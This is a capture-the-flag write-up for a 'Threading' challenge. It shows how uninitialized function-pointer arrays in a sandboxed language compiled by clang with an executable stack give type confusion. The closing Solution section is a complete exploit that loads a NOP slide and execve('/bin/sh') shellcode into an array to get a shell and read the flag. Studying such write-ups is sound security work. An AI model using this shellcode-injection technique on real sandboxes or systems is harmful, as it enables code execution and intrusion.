badicsalex/threading_writeup.md

## threading_writeup.md

      
    Raw
  

              threading_writeup.md
            
          
    Threading


Original description
The task
The sandboxed language
The attack surface
Fun with undefined behaviour
Solution

Original description

The DevMaster Sandboxed Programming Language: Creating unintentional bugs since 2019™
After our last disaster with a sandboxed build system, we've decided to pivot. We've created a sandboxed programming language with userland thread support. Why userland threads? Because they're fast! (Benchmark results pending.)
With this language, you can write code that's safe to run anywhere. Those executing your code can trust that it won't ever be able to read their precious ./flag files.
(Legal notice: 'can trust' may not be equivalent to 'should trust.' DevMaster Industries disclaims all liability resulting from running code written in the DevMaster Sandboxed Programming Language.)
The task

The task is to write a source code in a somewhat C-like limited language, that will be run on the server, and escape the shackles of the language itself.
The "compiler" for this language is written using PEGTL, and translates sources written in the sandboxed language to C++, and then compiles that to the actual binary.
There were a few examples and a toolchain shellscript. E.g. one of these examples is array_conversion:
def int32 main() {
  array<int32, 4> arr;
  arr[0] = 0;
  arr[1] = 1;
  arr[2] = 2;
  arr[3] = 3;
  
  int32 i = 0;
  array<int32> dyn_arr = make_array<int32>(size(arr));
  while (i < size(arr)) {
    dyn_arr[i] = arr[i];
    i = i + 1;
  }
  
  print(dyn_arr);
  print("\n");
  return 0;
}

Which is translated to:
   // Intermediate representation, autogenerated.
#include "runtime.h"
int32 __attribute__ ((noinline)) sbt_main() {
{
fixed_array<int32, 4ULL> sbt_arr;
(sbt_arr).setitem(0ULL, (0ULL));
(sbt_arr).setitem(1ULL, (1ULL));
(sbt_arr).setitem(2ULL, (2ULL));
(sbt_arr).setitem(3ULL, (3ULL));
int32 sbt_i = 0ULL;
dynamic_array<int32> sbt_dyn_arr = (sbt_make_array<int32>((sbt_size(sbt_arr))));
while ((sbt_i) < ((sbt_size(sbt_arr)))) {
{
(sbt_dyn_arr).setitem(sbt_i, ((sbt_arr).getitem(sbt_i)));
sbt_i = ((sbt_i) + (1ULL));
}
}
(sbt_print(sbt_dyn_arr));
(sbt_print(make_string("\n")));
return (0ULL);
}
}

int main() {
  std::cout << std::unitbuf; 
  std::cerr << std::unitbuf; 
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  _exit(sbt_main());
}

It is then compiled by the script with the following flags: clang++ -O3 -g --std=c++17 -Werror=return-type -g -lpthread -z execstack -fno-stack-protector. Imagine whatever meme you want here for the last two flags.
Then it is run, and gets the socket fd as stdin and stdout.
The sandboxed language

The language allows for simple operators, a limited set of simple types, simple functions, and most importantly, threads and function pointers. It provides an also limited set of library functions, and since all names are mangled, only these can be properly used. Simple types are implemented using C++ classes with overloaded operators, which are then exposed to the software:

template <typename T, size_t sz>
struct fixed_array {
  std::array<T, sz> impl;
  void setitem(size_t idx, T new_value) {
    if (idx >= sz) {
      exit_fail("Attempt to set field in fixed array of size " +
                std::to_string(sz) + " with past-the-end index " +
                std::to_string(idx));
    }
    impl[idx] = new_value;
  }
  T getitem(size_t idx) {
    if (idx >= sz) {
      exit_fail("Attempt to get field in fixed array of size " +
                std::to_string(sz) + " with past-the-end index " +
                std::to_string(idx));
    }
    return impl[idx];
  }
  size_t size() { return sz; }
};

The allowed types are:

char (which is uint8_t), int32, int64, uint32, uint64: Which are wrapped in a class, implementing the atomic version of the simple int types.
string, semaphore, thread: These are builtin types implemented as classes
fixed_array and dynamic_array are templated classes
ref is a templated reference type containing a shared_ptr
func is a raw function pointer type

Some selected library functions:

make_array, make_string, resize
new, deref
various tempalte specializations for print and hex to/from conversions
make_thread, (semaphore) up, (semaphore) down, usleep

The attack surface

It looks like that there is a non-trivial userspace thread implementation for the whole thing, which I guess was supposed to be PWN-ed. This is not what I did, because it looked complicated.
I've looked at holes in the code generator.
At first, it looks pretty safe:

Only very limited operator set
Everything is quite properly typechekced, because all types are actually classes
Array operations are "compiled" into their safe versions.
The "library functions" looked bulletproof.

However, there was one extremely helpful comment in the language_docs.md about fixed arrays:
"fixed-size array on the stack will have its data members located on the stack"
How is that done? Looking at the runtime:
template <typename T, size_t sz>
struct fixed_array {
  std::array<T, sz> impl;
  ...

A quick look at std:array's documentation on cppreference:

(constructor) (implicitly declared): initializes the array following the rules of aggregate initialization (note that default initialization may result in indeterminate values for non-class T)

Sounds good. Do we have any non-class Ts?
Unfortunately everything is wrapped in classes; even ints are wrapped into an atomic class, which does actually have a definite zero-initialization... except raw function pointers.
What happens when we use array<func<void>, 16>? Things get weird...
Fun with undefined behaviour

So let's say our code is
def void uninitialized(){
    array<func<void>, 16> x;
    print(x[5]);
}

def int32 main() {
    print("henlo wrodl\n");
    uninitialized();
    return 0;
}

When compiled, this turns into:
void __attribute__ ((noinline)) sbt_uninitialized() {
  {
    fixed_array<func<void>, 16ULL> sbt_x;
    (sbt_print((sbt_x).getitem(5ULL)));
  }
}
int32 __attribute__ ((noinline)) sbt_main() {
  {
    (sbt_print(make_string("henlo wrodl\n")));
    (sbt_uninitialized());
    return (0ULL);
  }
}

int main() {
  std::cout << std::unitbuf; 
  std::cerr << std::unitbuf; 
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
  _exit(sbt_main());
}


When ran, it produces the following output:
Henlo wrodl
func<0x11>func<0x11>func<0x11>

(functions have a specialized print function showing the address of the function)
Looks like we got junk, which is a good thing. But is it actually memory junk we can use? Doesn't look like it. Let's see the disassembly:
   0000000000009000 <_Z17sbt_uninitializedv>:
    9000:       50                      push   rax
    9001:       e8 ca 1c 00 00          call   acd0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
    9006:       e8 c5 1c 00 00          call   acd0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
    900b:       58                      pop    rax
    900c:       e9 bf 1c 00 00          jmp    acd0 <_Z9sbt_printIvJEEvPFT_DpT0_E>

Which is basically two calls to sbt_print<void>(void (*)()), and then a tail call to it. The parameter setting is absolutely missing from the code. I guess clang detected the values were uninitialized and just decided to not even bother?
Let's see something a bit different:
def void dummy(){
}

def void uninitialized(){
    array<func<void>, 16> x;
    x[1] = dummy;
    print(x[0]);
    print(x[1]);
    print(x[2]);
}

def int32 main() {
    print("henlo wrodl\n");
    uninitialized();
    return 0;
}

This prints:
henlo wrodl
func<0x11>func<0x5634552f2000>func<0x7f6ba88ca4d0>

And the disassembly:
0000000000009010 <_Z17sbt_uninitializedv>:
    9010:       50                      push   rax
    9011:       e8 ca 1c 00 00          call   ace0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
    9016:       48 8d 3d e3 ff ff ff    lea    rdi,[rip+0xffffffffffffffe3]        # 9000 <_Z9sbt_dummyv>
    901d:       e8 be 1c 00 00          call   ace0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
    9022:       58                      pop    rax
    9023:       e9 b8 1c 00 00          jmp    ace0 <_Z9sbt_printIvJEEvPFT_DpT0_E>

Huh. So clang actually tracks the array values individually.
Okay. What if we simply call one of these c̡̫͙̦̳͓̜̦̎̑̓̆ͣͫ͛o͖̰̻̬̗͓̟̽̀r̦͕̮̜̱͙̄ͯ̽̄̒̀̒͘r̜̙̹̰̪̼̤ͧͯ͐̔ͩ̂u̲̍ͧͬͬ̐͢p̮̲̥̠̬̔ͨͣ͂́ť͖͍̹͕ͦ͌ values?
def void dummy(){
}

def void uninitialized(){
    array<func<void>, 16> x;
    x[0]();
}

def int32 main() {
    print("henlo wrodl\n");
    uninitialized();
    return 0;
}

It prints:
henlo wrodl
henlo wrodl
henlo wrodl
henlo wrodl
henlo wrodl
henlo wrodl

infinitely.
Wtf?? Looking at the symbol table, we see the following:
 580: 0000000000009000     0 FUNC    GLOBAL DEFAULT   14 _Z17sbt_uninitializedv
1205: 0000000000009000   282 FUNC    GLOBAL DEFAULT   14 _Z8sbt_mainv

Clang didn't even try to generate any code this time. Without going into the details of other testing steps: this works with any function. We can give any apparent signature to any function
E.g.:
def void jump_on_me(array<char, 128> arr){
    array<func<void>, 256> lel;
    lel[0]();
    print("Winning.");
}
def void dummy(func<void> f){
    f();
}

Calling jump_on_me will in fact call dummy. Dummy expects a single function pointer as a parameter, but it will get a character array.
There is one tiny little roadblock though: clang is well aware that jump_on_me is an a͍̗̬͠b̟̻̞͓̃̀ͥ̉̈s͕̲̞͕̙͓̄̋͗͐̍ͅo͙̻̩̼̒l͋͠u̵̠̮͔͓̭͉ͯ̐t̴͖̟̣̟̙͔ͨ̏̄͗͗̋͆e̥ͣͩͩl̮̣̳̼̈́ͧͥ̿ͨy̛̯͙ ̰͐̐̊̌ͅc̡̫͙̦̳͓̜̦̎̑̓̆ͣͫ͛o͖̰̻̬̗͓̟̽̀r̦͕̮̜̱͙̄ͯ̽̄̒̀̒͘r̜̙̹̰̪̼̤ͧͯ͐̔ͩ̂u̲̍ͧͬͬ̐͢p̮̲̥̠̬̔ͨͣ͂́ť͖͍̹͕ͦ͌ function, and will not even bother to actually set its parameters at the call site, so we need a bit of a trambouline:
def void jump_on_me(array<char, 128> arr){
    array<func<void>, 256> lel;
    lel[0]();
    print("Winning.");
}
def void dummy(func<void> f){
    f();
}

def void jump_help(array<char, 128> a){
    jump_on_me(a);
}

def int32 main() {
    array<char, 128> a;
    a[0] = 144; a[1] = 144; a[2] = 144;
    jump_help(a);
    return 0;
}

This generates the following magnificent object code:
000000000008ff0 <_Z9sbt_dummyPFvvE>:    ; Note that this is also the address of jump_on_me

    8ff0:       ff e7                   jmp    rdi

0000000000009000 <_Z13sbt_jump_help11fixed_arrayI14atomic_wrapperIhELm128EE>:
    9000:       8a 07                   mov    al,BYTE PTR [rdi]
    9002:       8a 47 01                mov    al,BYTE PTR [rdi+0x1]
    9005:       8a 47 02                mov    al,BYTE PTR [rdi+0x2]
    9008:       8a 47 03                mov    al,BYTE PTR [rdi+0x3]
    ...
    9179:       8a 47 7e                mov    al,BYTE PTR [rdi+0x7e]
    917c:       8a 47 7f                mov    al,BYTE PTR [rdi+0x7f]
    917f:       e9 6c fe ff ff          jmp    8ff0 <_Z9sbt_dummyPFvvE>  ; Note how rdi never gets set

0000000000009190 <_Z8sbt_mainv>:
    ...
    91c5:       b0 90                   mov    al,0x90
    91c7:       b1 90                   mov    cl,0x90
    91c9:       86 0c 24                xchg   BYTE PTR [rsp],cl
    91cc:       b1 90                   mov    cl,0x90
    91ce:       86 4c 24 01             xchg   BYTE PTR [rsp+0x1],cl
    91d2:       86 44 24 02             xchg   BYTE PTR [rsp+0x2],al
    ...
    9212:       48 8d bc 24 80 00 00    lea    rdi,[rsp+0x80]            ; This is the RDI set we will actually use
    9219:       00 
    921a:       e8 e1 fd ff ff          call   9000 <_Z13sbt_jump_help11fixed_arrayI14atomic_wrapperIhELm128EE>

Okay. We have proper type confusion. What now? Remember -z execstack? Yeah, we might as well just paste our favourite execve('/bin/sh') shellcode into the array, with a NOP slide for safety, and get a shell.
Solution

def void jump_on_me(array<char, 128> arr){
    array<func<void>, 256> lel;
    lel[0]();
    print("Winning.");
}
def void dummy(func<void> f){
    f();
}

def void jump_help(array<char, 128> a){
    jump_on_me(a);
}

def int32 main() {
    array<char, 128> a;
    a[0] = 144; a[1] = 144; a[2] = 144;
    a[3] = 144; a[4] = 144; a[5] = 144; a[6] = 144; a[7] = 144; a[8] = 144; a[9] = 144; a[10] = 144; a[11] = 144; a[12] = 144; a[13] = 144; a[14] = 144; a[15] = 144; a[16] = 144; a[17] = 144; a[18] = 144; a[19] = 144; a[20] = 144; a[21] = 144; a[22] = 144; a[23] = 144; a[24] = 144; a[25] = 144; a[26] = 144; a[27] = 144; a[28] = 144; a[29] = 144; a[30] = 144; a[31] = 144; a[32] = 144; a[33] = 144; a[34] = 144; a[35] = 144; a[36] = 144; a[37] = 144; a[38] = 144; a[39] = 144; a[40] = 144; a[41] = 144; a[42] = 144; a[43] = 144; a[44] = 144; a[45] = 144; a[46] = 144; a[47] = 144; a[48] = 144; a[49] = 144; a[50] = 144; a[51] = 144; a[52] = 144; a[53] = 144; a[54] = 144; a[55] = 144; a[56] = 144; a[57] = 144; a[58] = 144; a[59] = 144; a[60] = 144; a[61] = 144; a[62] = 144; a[63] = 144;
    a[64] = 80;
a[65] = 72;a[66] = 49;a[67] = 210;a[68] = 72;a[69] = 49;a[70] = 246;a[71] = 72;a[72] = 187;a[73] = 47;a[74] = 98;a[75] = 105;a[76] = 110;a[77] = 47;a[78] = 47;a[79] = 115;a[80] = 104;a[81] = 83;a[82] = 84;a[83] = 95;a[84] = 176;a[85] = 59;a[86] = 15;a[87] = 5;
    jump_help(a);
    return 0;
}

With shell, we can just do a cat flag, and the flag is CTF{This-challenge-was-very-hard}.
(Note: the original solution used a thread to get an executable mapped stack, but turns out it is not needed because of that weird gcc flag)